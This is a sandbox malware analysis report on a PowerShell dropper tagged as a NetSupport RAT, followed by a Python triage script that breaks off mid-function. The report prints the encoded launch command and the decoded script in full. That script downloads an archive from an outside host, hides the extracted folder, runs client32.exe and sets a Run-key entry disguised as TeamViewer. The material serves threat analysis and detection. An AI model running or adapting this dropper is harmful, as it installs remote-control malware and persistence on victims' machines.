
Windows Analysis Report
6471bc8dac218.ps1

Overview

General Information

Sample Name: 6471bc8dac218.ps1
Analysis ID: 876993
MD5: 12838e82541973a0e63820a421d4b8f6
SHA1: 6cca7441a420f3d3082f6787abeb6c5a6d9ae99b
SHA256: b146dd7f30d4ed7536f62fae414f34f45ca32173224ad3b4bc0a14651108b1ba
Tags: netsupportps1rat

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • powershell.exe (PID: 2220 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\6471bc8dac218.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: https://figocoin.it/auth.php | Avira URL Cloud: Label: malware
Source: https://figocoin.it/auth.php | Virustotal: Detection: 17%
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000003.454710662.00000220F6E6D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.469295261.00000220F6CF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.469891303.00000220F6D8B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.454165981.00000220F6D79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbY source: powershell.exe, 00000000.00000002.469295261.00000220F6CF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.Core.pdb source: powershell.exe, 00000002.00000002.435649399.0000023CABAD2000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDataP
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ObsoletedEle
Source: powershell.exe, 00000000.00000002.469295261.00000220F6CF3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.410344195.0000023CAB920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.433865748.0000023CAB93A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000003.410792964.0000023CABB97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.457788771.00000220DEC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.413701569.0000023C938B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.413701569.0000023C938B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://figocoin.it/auth.php
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.413701569.0000023C94DB3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 2238
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFBABF7AA2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFBABF885AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFBABF821C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFBABF8220C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFBABF81AC5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\6471bc8dac218.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc 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
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\TeamViewer_3533
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqh5g0kf.gjx.ps1
Source: classification engine | Classification label: mal72.troj.evad.winPS1@4/8@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFBAC0461EC push eax; ret 0_2_00007FFBAC0461ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFBAC045EF4 push ebx; ret 0_2_00007FFBAC045EF5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFBAC045204 pushad ; ret 0_2_00007FFBAC045205
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFBAC045C2B push esi; ret 0_2_00007FFBAC045C2C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFBAC04AC0F push es; ret 2_2_00007FFBAC04AC11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFBAC047410 pushfd ; ret 2_2_00007FFBAC047411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFBAC049413 push ds; ret 2_2_00007FFBAC049415
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TeamViewer_3533
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9761
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9039
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192 Thread sleep count: 9039 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (2 events)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBnAG8AYwBvAGkAbgAuAGkAdAAvAGEAdQB0AGgALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABUAGUAYQBtAFYAaQBlAHcAZQByAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAFQAZQBhAG0AVgBpAGUAdwBlAHIAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded: cd $env:AppData; $link='https://figocoin.it/auth.php'; $rnum=Get-Random -minimum 5 -maximum 9; $rrnum=Get-Random -minimum 1024 -maximum 9999; $chrs='abcdefghijklmnopstuvwxyzABCDEFGHIJKLMNOPRSTUVWXYZ'; $rstr=''; $ran=New-Object System.Random; for ($i=0; $i -lt $rnum; $i++) {$rstr+=$chrs[$ran.next(0, $chrs.Length)]}; $rzip=$rstr+'.zip'; $path=$env:APPDATA+'\'+$rzip; $pzip=$env:APPDATA+'\TeamViewer_'+$rrnum; Start-BitsTransfer -Source $link -Destination $Path; expand-archive -path $path -destinationpath $pzip; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $path; cd $pzip; start client32.exe; $fstr=$pzip+'\client32.exe'; $rnm='TeamViewer_'+$rrnum; New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name $rnm -Value $fstr -PropertyType 'String';
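As an added worked example (not part of the Joe Sandbox report and not the sample's own code), the Python below reproduces offline what a responder does with the process-creation line above: decode the -enc argument (base64 of the UTF-16LE script), parse the launch flags, pull the indicators to pivot on (download URL, launched binary, Run key and value-name prefix, staging directory) and map them onto the checks behind the report's signature names. The decoded script text is copied from the report and the flags (-nop -ep bypass -win hid -enc) are the ones the report shows; the function names, regexes, signature mapping and the HKCU Run entries in SAMPLE_RUN_VALUES are assumptions constructed here. It goes one step beyond the report by turning the persistence artefact into a reusable registry check, since client32.exe is the NetSupport Manager client binary and the report tags the sample netsupport/rat.

```python
"""Offline triage of the encoded PowerShell stage from this report. Added example, not
part of the Joe Sandbox page and not the sample's own code. DECODED_SCRIPT is the second
stage as the report prints it and the launch flags are the ones it shows; function names,
regexes, the signature mapping and SAMPLE_RUN_VALUES are constructed assumptions."""
import base64
import re

# Second stage copied from the report's "Base64 decoded" line.
DECODED_SCRIPT = (
    r"cd $env:AppData; $link='https://figocoin.it/auth.php'; $rnum=Get-Random -minimum 5 -maximum 9; "
    r"$rrnum=Get-Random -minimum 1024 -maximum 9999; $chrs='abcdefghijklmnopstuvwxyzABCDEFGHIJKLMNOPRSTUVWXYZ'; "
    r"$rstr=''; $ran=New-Object System.Random; for ($i=0; $i -lt $rnum; $i++) {$rstr+=$chrs[$ran.next(0, $chrs.Length)]}; "
    r"$rzip=$rstr+'.zip'; $path=$env:APPDATA+'\'+$rzip; $pzip=$env:APPDATA+'\TeamViewer_'+$rrnum; "
    r"Start-BitsTransfer -Source $link -Destination $Path; expand-archive -path $path -destinationpath $pzip; "
    r"$FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $path; cd $pzip; "
    r"start client32.exe; $fstr=$pzip+'\client32.exe'; $rnm='TeamViewer_'+$rrnum; "
    r"New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name $rnm -Value $fstr -PropertyType 'String';"
)

def encode_ps_command(script):
    """-EncodedCommand takes base64 of the UTF-16LE script text (no BOM)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_ps_command(b64):
    """Inverse of encode_ps_command. Base64 is case-sensitive: a lower-cased log copy will not decode."""
    return base64.b64decode(b64).decode("utf-16-le")

def parse_powershell_cmdline(cmdline):
    """Flags that matter for triage; powershell.exe accepts unique switch prefixes plus -ep and -ec."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    flags = {"image": tokens[0] if tokens else "", "no_profile": False, "execution_policy": None,
             "window_style": None, "encoded_command": None, "length": len(cmdline)}
    i = 1
    while i < len(tokens):
        name = tokens[i][1:].lower() if tokens[i].startswith("-") else ""
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if len(name) >= 3 and "noprofile".startswith(name):
            flags["no_profile"] = True
        elif name == "ep" or (len(name) >= 2 and "executionpolicy".startswith(name)):
            flags["execution_policy"], i = nxt, i + 1
        elif name == "ec" or (name and "encodedcommand".startswith(name)):
            flags["encoded_command"], i = nxt, i + 1
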